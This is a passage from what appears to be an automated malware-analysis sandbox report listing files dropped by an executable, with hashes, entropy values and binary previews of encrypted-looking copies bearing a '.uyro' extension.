SSDEEP:	24:9ukpzsQuzarL+/9g/ufoT58LXAdsqJ8RIfdHldq+MsTagpvEGEzcvHvnIqRrzubD:Tl7rk9g/ufo4IfFldBtdEXzcvvVMD
MD5:	C996715CC7D67CC39C939AD650ABBBFB
SHA1:	4A917C56A893691485DB95234DA0612F61C16C74
SHA-256:	0219F8DBB7B5BC90C959E41D6EACC62B430DEF8FA08F2C70FC563F88E056DFFC
SHA-512:	5EECB7DE980AE9214C982511B4F897C76FC9D6984176DB2D2FB595E4814253DAAF0716D05F5532D807B07472C847084EF2F6B08B8304E28905C649E6C9E42162
Malicious:	false
Reputation:	unknown
Preview:	WUTJS...%y..2.V./2.K~.q.r.~.P....N:.BW...R0A.........W.Sh.........A..,...xr...u.9..}q.=......p.M...p.......W...........:.^u...5.....k.u+.(wp!..1.@.0..n.[..&.1t....V.1w....Fu.q....O..X...u..V...,....=u3...e!....j..U...6'...X.....<.8%O.U.UKh...p.>kJ.w~.....S..."a....^Jk...E..].:..0.4.0.. .Y.-.K!..:..G1.......{.........k_[.2.!.!lD$.t.'dO@c..(.....8...i..O......A...]...........dX.....j..h.?.1.E2.n:...A.....~.p......\.=..9..3....:T=......qtH8b......h..U.1.S$..W....R..K......Li. ..'..$...v.........!....'..;lx.=.J..T./.dx.{"jPH....O...4-....''="..4.i}1H....,..)....fNl[pHbD.........-..*a..:._7^..>.0~..~.0..i..M..)nD..W...v.`o..H.F....^7^M......].'.>.-....0........7:.hx...dX9.......&9I...S..tTu..F.lc>...l..?.D.7..&S)x....\....l....)/nh...g.U7..I....(.9V-!6.........c..e.)..Z.^......7.)..J`..`R..l.7..g-.....$......Z...Z.B.l..>.+%....(..ffw......Qa<.w.~X.\L..".!...;a.8TN3.O.a.....@$..n..Z...u3..#..\..>].2.....gR`.{...q.XZq......\%v.A.t.@.ra

C:\Users\user\Documents\WUTJSCBCFX\WUTJSCBCFX.docx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843529613881958
Encrypted:	false
SSDEEP:	24:9ukpzsQuzarL+/9g/ufoT58LXAdsqJ8RIfdHldq+MsTagpvEGEzcvHvnIqRrzubD:Tl7rk9g/ufo4IfFldBtdEXzcvvVMD
MD5:	C996715CC7D67CC39C939AD650ABBBFB
SHA1:	4A917C56A893691485DB95234DA0612F61C16C74
SHA-256:	0219F8DBB7B5BC90C959E41D6EACC62B430DEF8FA08F2C70FC563F88E056DFFC
SHA-512:	5EECB7DE980AE9214C982511B4F897C76FC9D6984176DB2D2FB595E4814253DAAF0716D05F5532D807B07472C847084EF2F6B08B8304E28905C649E6C9E42162
Malicious:	false
Reputation:	unknown
Preview:	WUTJS...%y..2.V./2.K~.q.r.~.P....N:.BW...R0A.........W.Sh.........A..,...xr...u.9..}q.=......p.M...p.......W...........:.^u...5.....k.u+.(wp!..1.@.0..n.[..&.1t....V.1w....Fu.q....O..X...u..V...,....=u3...e!....j..U...6'...X.....<.8%O.U.UKh...p.>kJ.w~.....S..."a....^Jk...E..].:..0.4.0.. .Y.-.K!..:..G1.......{.........k_[.2.!.!lD$.t.'dO@c..(.....8...i..O......A...]...........dX.....j..h.?.1.E2.n:...A.....~.p......\.=..9..3....:T=......qtH8b......h..U.1.S$..W....R..K......Li. ..'..$...v.........!....'..;lx.=.J..T./.dx.{"jPH....O...4-....''="..4.i}1H....,..)....fNl[pHbD.........-..*a..:._7^..>.0~..~.0..i..M..)nD..W...v.`o..H.F....^7^M......].'.>.-....0........7:.hx...dX9.......&9I...S..tTu..F.lc>...l..?.D.7..&S)x....\....l....)/nh...g.U7..I....(.9V-!6.........c..e.)..Z.^......7.)..J`..`R..l.7..g-.....$......Z...Z.B.l..>.+%....(..ffw......Qa<.w.~X.\L..".!...;a.8TN3.O.a.....@$..n..Z...u3..#..\..>].2.....gR`.{...q.XZq......\%v.A.t.@.ra

C:\Users\user\Documents\WUTJSCBCFX\ZBEDCJPBEY.pdf

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.833574694963091
Encrypted:	false
SSDEEP:	24:lbAkeO5JvQAxKEYMl1g32mbOLjXA0tPZXh9ZBYN/ZIxbK0wcjYRlUP2RlbOTFuMX:Xe8KAxKU4GmbyX5x9ZBgSxbK0wPzRQTH
MD5:	972CAC8455E043D7FA58F6F14784818C
SHA1:	207CF10903C57717FD5DE59DA8DC333D808EF107
SHA-256:	1DF8F5ED69FE74EBA74C316D233AD157310A9745538C33B735D65BF7BCEFFE22
SHA-512:	CBD8E45DF751030B8EEEC77741CC3BD38D22731B2798AC8C98B247E68438889717C89E023B1A5699D37AD5B1CDAE3CF3B9769D72414E20571DB56997D17BACC8
Malicious:	false
Reputation:	unknown
Preview:	ZBEDC.....`.)k^n.`.U.b..<.......o..b.S.../s7..<7...K).AF..ei.O......Cv./2;.}7.k..=.R........._...M..H&7T.......m8c..RVWVp71.......X.}W.zs.2...!r[..+5..vb.....!8.....u.71...P...w7).D.."..d...#2.<.../f.5...........>i.)W.ZB_.y....d.....l...b..}.7....u......b.i.....B..D...'.$....#.sI.oz._.x........x$.Q...j.w54.7\|..xJ._.iq[.n5........:T."M...o.k..bp<.2...9..].T5...r.'.)....2q....m.X...3..f.(.)kI....O... 5....{.....U7..}.0...x.2......=<..%xt.n....G....k>.....H.@.?...k..4w.<..j.v....f.c..S(.H..b..w..)...(~....j..I...i..R...R}....J.....#....!J.p..S.m..y7=X9...I.Yx...{(..7g`#.ua.H^e.~q.FU4...fV.u.w...D.../..?............m.!.5...&..h.GJ.g.9.f."...%.aw....%.Q>...+..d......`.+L...ajnV.s6..8.gJ.6:\|.m..>&:.q3..i?ghP..Y...n.L.VK..9a.^.L.....}..tX..^S."f.F.K[..xk!.<.s@y[....5!........$....?%.II:........Y.!./q..E..Y.Lr...m:.z....M.:.h.8...*......-.R}..Z..)...Z.....1.0L.....q......ha.....x...7...C.\.:..T..F.....z.yv.j.0..L.;.It.P8...om4....B.....<^!%/.1...y..p\.~\

C:\Users\user\Documents\WUTJSCBCFX\ZBEDCJPBEY.pdf.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.833574694963091
Encrypted:	false
SSDEEP:	24:lbAkeO5JvQAxKEYMl1g32mbOLjXA0tPZXh9ZBYN/ZIxbK0wcjYRlUP2RlbOTFuMX:Xe8KAxKU4GmbyX5x9ZBgSxbK0wPzRQTH
MD5:	972CAC8455E043D7FA58F6F14784818C
SHA1:	207CF10903C57717FD5DE59DA8DC333D808EF107
SHA-256:	1DF8F5ED69FE74EBA74C316D233AD157310A9745538C33B735D65BF7BCEFFE22
SHA-512:	CBD8E45DF751030B8EEEC77741CC3BD38D22731B2798AC8C98B247E68438889717C89E023B1A5699D37AD5B1CDAE3CF3B9769D72414E20571DB56997D17BACC8
Malicious:	false
Reputation:	unknown
Preview:	ZBEDC.....`.)k^n.`.U.b..<.......o..b.S.../s7..<7...K).AF..ei.O......Cv./2;.}7.k..=.R........._...M..H&7T.......m8c..RVWVp71.......X.}W.zs.2...!r[..+5..vb.....!8.....u.71...P...w7).D.."..d...#2.<.../f.5...........>i.)W.ZB_.y....d.....l...b..}.7....u......b.i.....B..D...'.$....#.sI.oz._.x........x$.Q...j.w54.7\|..xJ._.iq[.n5........:T."M...o.k..bp<.2...9..].T5...r.'.)....2q....m.X...3..f.(.)kI....O... 5....{.....U7..}.0...x.2......=<..%xt.n....G....k>.....H.@.?...k..4w.<..j.v....f.c..S(.H..b..w..)...(~....j..I...i..R...R}....J.....#....!J.p..S.m..y7=X9...I.Yx...{(..7g`#.ua.H^e.~q.FU4...fV.u.w...D.../..?............m.!.5...&..h.GJ.g.9.f."...%.aw....%.Q>...+..d......`.+L...ajnV.s6..8.gJ.6:\|.m..>&:.q3..i?ghP..Y...n.L.VK..9a.^.L.....}..tX..^S."f.F.K[..xk!.<.s@y[....5!........$....?%.II:........Y.!./q..E..Y.Lr...m:.z....M.:.h.8...*......-.R}..Z..)...Z.....1.0L.....q......ha.....x...7...C.\.:..T..F.....z.yv.j.0..L.;.It.P8...om4....B.....<^!%/.1...y..p\.~\

C:\Users\user\Documents\YPSIACHYXW.docx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845266897254719
Encrypted:	false
SSDEEP:	24:FQfZoFnM3STLNpVPrnjGfIgNP1Khi91jcvd4UpADNx6Ve3o8mPrmetOrGSHbD:FKiFM32Hb6ffO21jaLGN4NKeUl7D
MD5:	F421B1D9BB40C88E70F6C15109CE3D44
SHA1:	3E45FB93CBB1EF333D18851CCB3134423D5F4719
SHA-256:	F93B412E9B5DE4E0B16DFB977626DC88950FE323FBE3183D4129013067320AB3
SHA-512:	3C9EB8EFFD180FAF6019B8EFFB1ABF217F9C140413DE9EFD1604B465B2C3852367E5C6C7C55C274649F5823BD33EAD138511B5E56CE55BA50FE533588CF88ABC
Malicious:	false
Reputation:	unknown
Preview:	YPSIA&.B....I.=iU..AZ......._$\.TsD..5..f..P.. I4;:...p#.;h...8O...1,...t&..n.P..p.z..1}"..'=..6`....v.$..1?"?E.+.......y.[...O....`'..l.p.F.....P.6d.....W...j%..d...`.4..e?.z.8",Y#.....2.z{..f!....[..Dj...5..J..6..t....X.....'..c..R.H..Ii%O.r.kY%...v.....i..#.#k...d..=U.VM)....R#.z...G.M...A..0.e.j4....\|@f8.4.....)..:"...\ne...W..e.s.T`...sF.w.U.G..c.-.......P..X....:.8/..B.r.W..y.H7...H......Z...A.......u_.......>*....]...?..!5=nS.'..v.A.y9>6=..rZs......J...n.C.L..'..[.-5..Q.=.+V;.&.&....&7@.E...r.V]j/........X9...9..1.\....e.....r...Z..[G.......y.....X+:..+......[.Zk.....x..e.c.....XI`....Z.m.qfEq..4..q.!.W.z.'i8c..O..~.3.@F}o.@..UQFdP(^.tA.`L.....2[..f.&..\|T\.O._..l.l..2.B..m..]...{..v$K.d.~..5.'.....=...@@w..b..\>o..I.......'F......f...j....8.f.#t".\|...yF.T .....p...H.........p...gud..+..o.e.i.F.XmC..w...O....V..X.....0.\|F.^..1.\.{."H}.D..v!p.s,...\|G+O...51.f......c.a.......".S...rHw@..hE...&..6f..v.....d.j.s7o...@&..T=.A...'.D.aa.R

C:\Users\user\Documents\YPSIACHYXW.docx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845266897254719
Encrypted:	false
SSDEEP:	24:FQfZoFnM3STLNpVPrnjGfIgNP1Khi91jcvd4UpADNx6Ve3o8mPrmetOrGSHbD:FKiFM32Hb6ffO21jaLGN4NKeUl7D
MD5:	F421B1D9BB40C88E70F6C15109CE3D44
SHA1:	3E45FB93CBB1EF333D18851CCB3134423D5F4719
SHA-256:	F93B412E9B5DE4E0B16DFB977626DC88950FE323FBE3183D4129013067320AB3
SHA-512:	3C9EB8EFFD180FAF6019B8EFFB1ABF217F9C140413DE9EFD1604B465B2C3852367E5C6C7C55C274649F5823BD33EAD138511B5E56CE55BA50FE533588CF88ABC
Malicious:	false
Reputation:	unknown
Preview:	YPSIA&.B....I.=iU..AZ......._$\.TsD..5..f..P.. I4;:...p#.;h...8O...1,...t&..n.P..p.z..1}"..'=..6`....v.$..1?"?E.+.......y.[...O....`'..l.p.F.....P.6d.....W...j%..d...`.4..e?.z.8",Y#.....2.z{..f!....[..Dj...5..J..6..t....X.....'..c..R.H..Ii%O.r.kY%...v.....i..#.#k...d..=U.VM)....R#.z...G.M...A..0.e.j4....\|@f8.4.....)..:"...\ne...W..e.s.T`...sF.w.U.G..c.-.......P..X....:.8/..B.r.W..y.H7...H......Z...A.......u_.......>*....]...?..!5=nS.'..v.A.y9>6=..rZs......J...n.C.L..'..[.-5..Q.=.+V;.&.&....&7@.E...r.V]j/........X9...9..1.\....e.....r...Z..[G.......y.....X+:..+......[.Zk.....x..e.c.....XI`....Z.m.qfEq..4..q.!.W.z.'i8c..O..~.3.@F}o.@..UQFdP(^.tA.`L.....2[..f.&..\|T\.O._..l.l..2.B..m..]...{..v$K.d.~..5.'.....=...@@w..b..\>o..I.......'F......f...j....8.f.#t".\|...yF.T .....p...H.........p...gud..+..o.e.i.F.XmC..w...O....V..X.....0.\|F.^..1.\.{."H}.D..v!p.s,...\|G+O...51.f......c.a.......".S...rHw@..hE...&..6f..v.....d.j.s7o...@&..T=.A...'.D.aa.R

C:\Users\user\Documents\YPSIACHYXW.jpg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8439398783825425
Encrypted:	false
SSDEEP:	24:EB80D8701CoJnhYtMMOkam+l1UWEm6s1A8h9U216x9DuObD:Ee0AVin6tMCaqWEm6svh9vaLD
MD5:	66DEE5304A1EC0409C87253348D73FAF
SHA1:	D1E18C6E0B439A99106BB500E192BFC24FA72C85
SHA-256:	89732E4A79B8C19F0FF5CD0A11B900EC942C8256E9127C449E124B3C81291D7E
SHA-512:	4B3963F4F85AC691087831551DFBDA787B5643835435228C15EB4743147E91F1DD1782332048F7783993B51CF8D68ACB61E7CCEB06026F8A10E1664A9D47B059
Malicious:	false
Reputation:	unknown
Preview:	YPSIA...h.z67....F...&i..n.y..D.v>[BU T...h....~....V....@......i..m..X..9.>CB......5......f..~....g.\|_......Q^oL.z........c.......T.v)@......<3.I..{..t.3!`..!...8.]..#..wM..E....h......,.mL..rd..M..&..9....?<.........o...x..!.{s..........9FC.h.....F..........d..g.,,f...0.-.......@...0P.{.D.......h.Bs..P..K.H......+V....#.rf.].XM.....\|.^.0.t]$E.FI.......;.(.Bz................\|X..tF..y...I..!.p...c6d.?..br;...0..z#1...7.+...~....OM[..ii...9.....Q...q./.L....1..yUG../FV.......N.S].........?.]......x.k.+..Q(j$>z..$..u...q...4.\|]...8GH`.......{. <..o)..xJ....).C~...<..m.rl...p..w..\|{]M..H.lW......k..F.....t'0 )<....1?I..,U?v.48....L.R.S.).....b[0.PC....]\|.>.qr\3v.....g...H:.R......z.!qy....B.H...j6.........Y.<2.*A~.....0G7.f..."..i...R.)k.C...'9.....n.A<k./...O......m....f..D....J.......B!E....d.....x..L.......4....8F={....?.y.,...K.....ry6..DC...M......u...JN!}.....o...b1....%.......m5.a..Z.[.?..G.=.oS8G.8......a:..q.!?.ca.rU.

C:\Users\user\Documents\YPSIACHYXW.jpg.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8439398783825425
Encrypted:	false
SSDEEP:	24:EB80D8701CoJnhYtMMOkam+l1UWEm6s1A8h9U216x9DuObD:Ee0AVin6tMCaqWEm6svh9vaLD
MD5:	66DEE5304A1EC0409C87253348D73FAF
SHA1:	D1E18C6E0B439A99106BB500E192BFC24FA72C85
SHA-256:	89732E4A79B8C19F0FF5CD0A11B900EC942C8256E9127C449E124B3C81291D7E
SHA-512:	4B3963F4F85AC691087831551DFBDA787B5643835435228C15EB4743147E91F1DD1782332048F7783993B51CF8D68ACB61E7CCEB06026F8A10E1664A9D47B059
Malicious:	false
Reputation:	unknown
Preview:	YPSIA...h.z67....F...&i..n.y..D.v>[BU T...h....~....V....@......i..m..X..9.>CB......5......f..~....g.\|_......Q^oL.z........c.......T.v)@......<3.I..{..t.3!`..!...8.]..#..wM..E....h......,.mL..rd..M..&..9....?<.........o...x..!.{s..........9FC.h.....F..........d..g.,,f...0.-.......@...0P.{.D.......h.Bs..P..K.H......+V....#.rf.].XM.....\|.^.0.t]$E.FI.......;.(.Bz................\|X..tF..y...I..!.p...c6d.?..br;...0..z#1...7.+...~....OM[..ii...9.....Q...q./.L....1..yUG../FV.......N.S].........?.]......x.k.+..Q(j$>z..$..u...q...4.\|]...8GH`.......{. <..o)..xJ....).C~...<..m.rl...p..w..\|{]M..H.lW......k..F.....t'0 )<....1?I..,U?v.48....L.R.S.).....b[0.PC....]\|.>.qr\3v.....g...H:.R......z.!qy....B.H...j6.........Y.<2.*A~.....0G7.f..."..i...R.)k.C...'9.....n.A<k./...O......m....f..D....J.......B!E....d.....x..L.......4....8F={....?.y.,...K.....ry6..DC...M......u...JN!}.....o...b1....%.......m5.a..Z.[.?..G.=.oS8G.8......a:..q.!?.ca.rU.

C:\Users\user\Documents\YPSIACHYXW\RAYHIWGKDI.pdf

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.874556650348613
Encrypted:	false
SSDEEP:	24:LRirpFJAl3DSeekSl8FHwMSFX554NWcSP3sbgU+1nHgezkSLJKbD:LRirvJAleTkSl8FHwMSFJ54HSPP9nHlE
MD5:	A29A177E0E54A39C4C38F57BB4AA9911
SHA1:	06EB20422807262976F4EF8E80CD7191E3F1E797
SHA-256:	FFD5E5876109F35408B643C803C8CBD27A947D4447A2E27F9E7A218833404076
SHA-512:	5C7CBB0DF0085D3238E5EC148DD0E860D6739EF4E0BD68D06AAC6511537F1C22D209B6CFDE4591DE29E43A5462C21E5491F19283E3347B906D2C0C393FF7DB4B
Malicious:	false
Reputation:	unknown
Preview:	RAYHI.?...>.+......"-.1_)H.qf\.\|..A..uvE..k..N......C)..N...I.....d...N..v......8~.q....n}..}0y..o.5.......\.. ;g..?.^..:DQ..j.(.mFC..xyg....Yu.,........d. ..8...kb..n.}a8............/S 0.%.....\|.\R.......9l.\. ../.~..3...&..'.[$4_.4?.T......kNB+.3.}B........%.P..V.%X...m...yB!....n..C.u..m..".gY....j.........8...r..........\|l.....'=.faUyt..$.\|.KA.@........=]t.?...U.a/.~..f..\8.?.g.....x.....2...1....]>..........$(t;......,.^..Xi..^.$.d5.9..p..3/...]V....z./...A...%.8Y.F.D..q<e#./.tg.F.tU.=$.5.VZ...4.l..~.......^........:h.r<...;.@..4.%l...>^.N.....<..86....F7\L.$..L#>d....h..eT.7#.R_4.....?j.Gja.k.-f.[..o]g......-P.........{l......r]..(....?.=w.dQ+.W.GDn.:Nl.X...x.'.O,(Bz..1..4.\|.....}#H.} -..(..B8....h.Y..pa-.o...._z.'=.....a...o.1.s..m..e=..1eCf8..A^.W..E.b.m......$....Zp.WQ...*HrL.f....C.sC...b........>!.6..@5k...II...f O.......z.~T.d.-...D.,.m.F.,Pa..yB.v./\.yl..e..Q.}.xb._r....e.6...w.M.#Q..,...+Y.........DP....d.7.....7.'...

C:\Users\user\Documents\YPSIACHYXW\RAYHIWGKDI.pdf.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.874556650348613
Encrypted:	false
SSDEEP:	24:LRirpFJAl3DSeekSl8FHwMSFX554NWcSP3sbgU+1nHgezkSLJKbD:LRirvJAleTkSl8FHwMSFJ54HSPP9nHlE
MD5:	A29A177E0E54A39C4C38F57BB4AA9911
SHA1:	06EB20422807262976F4EF8E80CD7191E3F1E797
SHA-256:	FFD5E5876109F35408B643C803C8CBD27A947D4447A2E27F9E7A218833404076
SHA-512:	5C7CBB0DF0085D3238E5EC148DD0E860D6739EF4E0BD68D06AAC6511537F1C22D209B6CFDE4591DE29E43A5462C21E5491F19283E3347B906D2C0C393FF7DB4B
Malicious:	false
Reputation:	unknown
Preview:	RAYHI.?...>.+......"-.1_)H.qf\.\|..A..uvE..k..N......C)..N...I.....d...N..v......8~.q....n}..}0y..o.5.......\.. ;g..?.^..:DQ..j.(.mFC..xyg....Yu.,........d. ..8...kb..n.}a8............/S 0.%.....\|.\R.......9l.\. ../.~..3...&..'.[$4_.4?.T......kNB+.3.}B........%.P..V.%X...m...yB!....n..C.u..m..".gY....j.........8...r..........\|l.....'=.faUyt..$.\|.KA.@........=]t.?...U.a/.~..f..\8.?.g.....x.....2...1....]>..........$(t;......,.^..Xi..^.$.d5.9..p..3/...]V....z./...A...%.8Y.F.D..q<e#./.tg.F.tU.=$.5.VZ...4.l..~.......^........:h.r<...;.@..4.%l...>^.N.....<..86....F7\L.$..L#>d....h..eT.7#.R_4.....?j.Gja.k.-f.[..o]g......-P.........{l......r]..(....?.=w.dQ+.W.GDn.:Nl.X...x.'.O,(Bz..1..4.\|.....}#H.} -..(..B8....h.Y..pa-.o...._z.'=.....a...o.1.s..m..e=..1eCf8..A^.W..E.b.m......$....Zp.WQ...*HrL.f....C.sC...b........>!.6..@5k...II...f O.......z.~T.d.-...D.,.m.F.,Pa..yB.v./\.yl..e..Q.}.xb._r....e.6...w.M.#Q..,...+Y.........DP....d.7.....7.'...

C:\Users\user\Documents\YPSIACHYXW\SFPUSAFIOL.mp3

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.875229349278656
Encrypted:	false
SSDEEP:	24:zGSrZuzOBV93opJSie5mtVvKD9VMNWDpYJXuoSCGCexfKKB1+U+gzYAuubD:zGs8OLXirtGMQFwLSCGhRLglAxD
MD5:	393CA0AD32FB9BEC927412510A3A511E
SHA1:	4B5A8D279C8FFB91520E8D9A51D39595D559F1EC
SHA-256:	5D9A791A6ABB947AD8B69C9A385BA52F8350697A9C59CCC592F9697C72BB5437
SHA-512:	024FBD2B4DC265A25F422E7F9DE33442814BF3487508041026D431D01202221DE4551403CAC9E8846450E9F5A0282F97A013966935CD499BA29124E7FC0ECEB7
Malicious:	false
Reputation:	unknown
Preview:	SFPUS.......t.$....+.....W..a.gH..@....y..._y......L...........c.\|"....dV..i.T..,..BZ....bMw-o.:...i.....Qt...J..y.p..5...z.l9.@.F.n....>drt.8.( .f..j...#.......L.N[.u ...C....\|.......O....{\........l...S.r...jb8.s...w....!1.>.x.x..........#.E...gd&.Z..x....KwY.j_.8.D'.".u..m%..7O..N...(.Rb.g.F..!`.l..j:~...c...L...%.....'..&......%..h...c*.S..k...f...3.X.$'...V=........].... ...3]#U8.....$....~..N.._.......yih1O_.2.I.p........]......C.D {.......0..(...U........,..m..4T......y_...............m..{.N.l0....a]...gIm..#..T...s.`...m.]`}5.<.Or#xg...yU.%..v2.P.)kn.....L...Hg...\.,e.MEn&.G.k...tDT.MrS........-. c.V.U...R.X..}..m$....../[x"....}....vD.UNJ..I'.pM.X.u6...w!.....r..4.....>.=.\...y\.J.&........F"`....2...zZ&....0........?!..&r.r...N.L.}B"PU.L.....T9.z....l7].8e....n.`..Hc+_...xU.............B.....n..x......8e..A.R.....l..4.......MH....T.'f..V4.F..X.~.F..f...\b.......}.'.e.l...5...1..S..]..%.Y....O..aS.Rt#..H.&^....D.b..:a.

C:\Users\user\Documents\YPSIACHYXW\SFPUSAFIOL.mp3.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.875229349278656
Encrypted:	false
SSDEEP:	24:zGSrZuzOBV93opJSie5mtVvKD9VMNWDpYJXuoSCGCexfKKB1+U+gzYAuubD:zGs8OLXirtGMQFwLSCGhRLglAxD
MD5:	393CA0AD32FB9BEC927412510A3A511E
SHA1:	4B5A8D279C8FFB91520E8D9A51D39595D559F1EC
SHA-256:	5D9A791A6ABB947AD8B69C9A385BA52F8350697A9C59CCC592F9697C72BB5437
SHA-512:	024FBD2B4DC265A25F422E7F9DE33442814BF3487508041026D431D01202221DE4551403CAC9E8846450E9F5A0282F97A013966935CD499BA29124E7FC0ECEB7
Malicious:	false
Reputation:	unknown
Preview:	SFPUS.......t.$....+.....W..a.gH..@....y..._y......L...........c.\|"....dV..i.T..,..BZ....bMw-o.:...i.....Qt...J..y.p..5...z.l9.@.F.n....>drt.8.( .f..j...#.......L.N[.u ...C....\|.......O....{\........l...S.r...jb8.s...w....!1.>.x.x..........#.E...gd&.Z..x....KwY.j_.8.D'.".u..m%..7O..N...(.Rb.g.F..!`.l..j:~...c...L...%.....'..&......%..h...c*.S..k...f...3.X.$'...V=........].... ...3]#U8.....$....~..N.._.......yih1O_.2.I.p........]......C.D {.......0..(...U........,..m..4T......y_...............m..{.N.l0....a]...gIm..#..T...s.`...m.]`}5.<.Or#xg...yU.%..v2.P.)kn.....L...Hg...\.,e.MEn&.G.k...tDT.MrS........-. c.V.U...R.X..}..m$....../[x"....}....vD.UNJ..I'.pM.X.u6...w!.....r..4.....>.=.\...y\.J.&........F"`....2...zZ&....0........?!..&r.r...N.L.}B"PU.L.....T9.z....l7].8e....n.`..Hc+_...xU.............B.....n..x......8e..A.R.....l..4.......MH....T.'f..V4.F..X.~.F..f...\b.......}.'.e.l...5...1..S..]..%.Y....O..aS.Rt#..H.&^....D.b..:a.

C:\Users\user\Documents\YPSIACHYXW\SQRKHNBNYN.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.853261020541197
Encrypted:	false
SSDEEP:	24:p0pVGvUKDw+E7tlpd9EY6TE21MQcqRlqTfGCMsy0M2DWimRCpNV9pYKIbD:YVWk+E7P5EY6ly/klph39YDTLkD
MD5:	CDDBBB4A46941FB750BEFB8AE994CDB5
SHA1:	4929C73794825C4EFA449E94FCD59E879B454B8E
SHA-256:	01001AAD538DDD3BA5DBA7350A574D91BA6200A03024B806B805E3793EA66773
SHA-512:	5DFB4265449530579AAE0CEE1FB8D0F008B82B7E766304B6AA7B55CE9E4FB0F84ECE6417B18FCA3D3EE494F70C89B99037E8DD7DF2E1D51695C466CD1CD83666
Malicious:	false
Reputation:	unknown
Preview:	SQRKHE.....n......%.(.-?..X.X./5./....p...k-.#.(...O.M....a.....yA.......m...{n...~.x..A.`..e1ql..d"......).vI. ..2......}...e.H...8...m..?.xbK..8O.mSMc.....~1..%......(%~.8...{......ep...n..._2F.'\.9..6.....H.....~E ....>Sm.\|tKV.>.^;g.BV......=.4....Ra./..f...B...?..@....!...P.../c1...)t....KXN........h...&.1..:U9....d ,ifm........?.N...e...l.>..;..kK:......PO.,.sma..i.9&R....y.).......~..#..I.>..e.... L.2V....[D.<......s.~.%J.mN..Gw...EA,....A.Z..2.........G.....E+.....eJKO..8.....CG....vU.?i.U......."g...Z.Ly:k-...a-...`1......`.M....~.'E.2.....1z.r3.B..dJ.d.w......@.Q.s0g.....=..-..%...4S.v.j.~H...d.[.pe.7.)...!..Tr....{....SOc.0{...t..u.... f....t.Z_...0...s..:+..6N....<b.q..<A....fQ=.[..G.k.'F..qTQ-.g.....;..p.......Z..}.b...z.J...T.W....Zw..N.G.o.I8P.....<I....k...?...o.z..H($......N.b."G....9....a.3s..yA{-..+...f..=e.PaPt`?...a....b..0.C..W.XX./1j...T#'..f..;U.'.....t.]....\|Z...d.=...=..P'TN..hR.56..,\...f..n.iD...].A.v.(.q..

C:\Users\user\Documents\YPSIACHYXW\SQRKHNBNYN.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.853261020541197
Encrypted:	false
SSDEEP:	24:p0pVGvUKDw+E7tlpd9EY6TE21MQcqRlqTfGCMsy0M2DWimRCpNV9pYKIbD:YVWk+E7P5EY6ly/klph39YDTLkD
MD5:	CDDBBB4A46941FB750BEFB8AE994CDB5
SHA1:	4929C73794825C4EFA449E94FCD59E879B454B8E
SHA-256:	01001AAD538DDD3BA5DBA7350A574D91BA6200A03024B806B805E3793EA66773
SHA-512:	5DFB4265449530579AAE0CEE1FB8D0F008B82B7E766304B6AA7B55CE9E4FB0F84ECE6417B18FCA3D3EE494F70C89B99037E8DD7DF2E1D51695C466CD1CD83666
Malicious:	false
Reputation:	unknown
Preview:	SQRKHE.....n......%.(.-?..X.X./5./....p...k-.#.(...O.M....a.....yA.......m...{n...~.x..A.`..e1ql..d"......).vI. ..2......}...e.H...8...m..?.xbK..8O.mSMc.....~1..%......(%~.8...{......ep...n..._2F.'\.9..6.....H.....~E ....>Sm.\|tKV.>.^;g.BV......=.4....Ra./..f...B...?..@....!...P.../c1...)t....KXN........h...&.1..:U9....d ,ifm........?.N...e...l.>..;..kK:......PO.,.sma..i.9&R....y.).......~..#..I.>..e.... L.2V....[D.<......s.~.%J.mN..Gw...EA,....A.Z..2.........G.....E+.....eJKO..8.....CG....vU.?i.U......."g...Z.Ly:k-...a-...`1......`.M....~.'E.2.....1z.r3.B..dJ.d.w......@.Q.s0g.....=..-..%...4S.v.j.~H...d.[.pe.7.)...!..Tr....{....SOc.0{...t..u.... f....t.Z_...0...s..:+..6N....<b.q..<A....fQ=.[..G.k.'F..qTQ-.g.....;..p.......Z..}.b...z.J...T.W....Zw..N.G.o.I8P.....<I....k...?...o.z..H($......N.b."G....9....a.3s..yA{-..+...f..=e.PaPt`?...a....b..0.C..W.XX./1j...T#'..f..;U.'.....t.]....\|Z...d.=...=..P'TN..hR.56..,\...f..n.iD...].A.v.(.q..

C:\Users\user\Documents\YPSIACHYXW\WKXEWIOTXI.jpg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.827580501480238
Encrypted:	false
SSDEEP:	24:At/yT0KMoRHnUiHDC+mOiNzqcWGgLkmyvDkwhS92zvD1iLRbD:AxyTVRRvjCfOWucW7wmyvDRk92+D
MD5:	7B55DEAF28A3D0E5343CEB236B360503
